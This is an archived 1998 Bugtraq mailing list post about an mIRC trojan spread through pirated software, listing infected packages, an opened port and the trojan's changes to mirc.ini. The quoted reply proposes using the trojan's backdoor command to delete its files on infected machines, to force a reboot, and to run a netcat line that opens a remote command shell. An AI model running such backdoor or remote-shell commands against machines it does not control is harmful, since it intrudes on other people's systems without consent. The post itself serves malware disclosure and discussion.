Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Internet Wide DOS Attack using IRC
From: cluster () VIDEOTRON CA (Samuel Cossette)
Date: Sat, 3 Oct 1998 14:41:54 -0400


It's not the DO command of mirc, it's a buildin command, it's the equivalent
of /QUOTE or /RAW in a irc client, this is send the data directly to the
server

At this time I have found 2 directly file infected:

Packet Handler Firewall and FlashFXP v1.0, both distributed on a XDCC bot on
#warez950-dcc. In a zip file with some fake .nfo and a SETUP.EXE (oce.exe)
of 354k. quicktools.ocx (EZFTP OLE Control Module), Mswinsck.ocx are also
included.

Another interesting thing, the server open the port 15150, this is prompt:
Enter your username:, probably a FTPD

The trojan can also modify you mirc.ini, this is add auto-op, and modify
your current script.


With the DO command enabled, they gave us the means to remotely disable
this trojan.

Something to the effect of;

msg <nick> .do del c:\windows\system\oce*.*

Then, msg <nick> .do <some evil command to lock up the machine, forcing a
reboot>.


...

The mIRC DO command is very powerful, and can be used to install netcat on
the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L
-p <any port> <your ip> -t -e command.com, giving a remote command prompt
to investigate/disinfect the machine.


___________________________________________________________________________
___
George Imburgia                                      e-mail:
gti () hopi dtcc edu
Systems Administrator                                Phone:  (302)739-4068
Delaware Technical & Community College               Fax:    (302)739-3345
Office of the President                              Pager:  (302)741-5962

Samuel Cossette
cluster () videotron ca



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault